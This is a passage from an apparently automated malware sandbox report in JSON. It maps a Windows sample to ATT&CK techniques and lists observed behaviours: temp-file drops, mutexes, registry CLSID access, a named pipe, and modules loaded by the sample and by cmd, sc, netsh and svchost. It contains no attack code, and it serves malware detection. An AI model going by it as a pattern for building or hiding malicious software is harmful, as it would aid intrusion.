Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\evryposw.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched \"Security Manager\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74BF0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 747B0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00004740)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"GDI32.DLL\" at base 763f0000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76440000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70420000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"KERNEL32\" at base 76080000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a040000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"KERNEL32.DLL\" at base 76080000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"WS2_32.DLL\" at base 77350000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"DBGHELP.DLL\" at base 6f140000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"USER32.DLL\" at base 76320000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"ADVAPI32.DLL\" at base 76260000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"SHELL32.DLL\" at base 75430000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"OLEAUT32.DLL\" at base 761c0000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"MSVCR100.DLL\" at base 69f80000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"NTDLL.DLL\" at base 771d0000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"OLE32.DLL\" at base 77070000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"CRYPTBASE.DLL\" at base 75060000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73d60000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"PROPSYS.DLL\" at base 73e90000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"COMCTL32.DLL\" at base 73fd0000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"APPHELP.DLL\" at base 74f80000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"CLBCATQ.DLL\" at base 76fe0000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a1b0000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73e90000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"NTMARTA.DLL\" at base 74540000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76080000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"SETUPAPI.DLL\" at base 76c50000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75410000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"PROFAPI.DLL\" at base 750f0000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75330000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76e90000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"SECUR32.DLL\" at base 74e00000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75320000\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f80000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70420000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 76080000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a040000\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 763f0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76440000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70420000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 76080000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a040000\n \"evryposw.exe\" loaded module \"KERNEL32.DLL\" at base 76080000\n \"evryposw.exe\" loaded module \"WS2_32.DLL\" at base 77350000\n \"evryposw.exe\" loaded module \"DBGHELP.DLL\" at base 6f140000\n \"evryposw.exe\" loaded module \"USER32.DLL\" at base 76320000\n \"evryposw.exe\" loaded module \"ADVAPI32.DLL\" at base 76260000\n \"evryposw.exe\" loaded module \"SHELL32.DLL\" at base 75430000\n \"evryposw.exe\" loaded module \"OLEAUT32.DLL\" at base 761c0000\n \"evryposw.exe\" loaded module \"MSVCR100.DLL\" at base 69f80000\n \"evryposw.exe\" loaded module \"SSPICLI.DLL\" at base 74f60000\n \"evryposw.exe\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"evryposw.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75410000\n \"evryposw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f80000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70420000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 76080000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a040000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ODBCINT.DLL\" at base 6a0b0000\n \"netsh.exe\" loaded module \"MSVCRT.DLL\" at base 76460000\n \"netsh.exe\" loaded module \"RASMONTR.DLL\" at base 6b4d0000\n \"netsh.exe\" loaded module \"NSHWFP.DLL\" at base 69d20000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 72750000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 70220000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 76080000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6d090000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6ca60000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 69970000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76080000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6d080000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 69940000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6c970000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6bea0000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6be90000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6bc00000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 69fa0000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 69880000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 69720000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 70670000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 696b0000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 682e0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6b4c0000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 68100000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 77070000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75060000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73d60000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74ae0000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 76320000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 76fe0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6b8a0000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 76260000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75410000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75410000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75410000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75410000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74870000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75070000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 70160000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75190000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 746b0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 747b0000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 761c0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70420000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 76080000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a040000\n \"svchost.exe\" loaded module \"KERNEL32.DLL\" at base 76080000\n \"svchost.exe\" loaded module \"NTDLL.DLL\" at base 771d0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73420000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 73170000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 731f0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73980000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73270000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75410000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73230000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74aa0000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74960000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73260000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 77350000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 732c0000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 71860000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 74f60000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75410000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74600000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004600)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002140)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002140)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002140)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002140)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003340)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003340)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003340)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003340)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002920)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002920)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002920)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002920)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002920)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002920)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002876)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002876)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002876)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002876)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 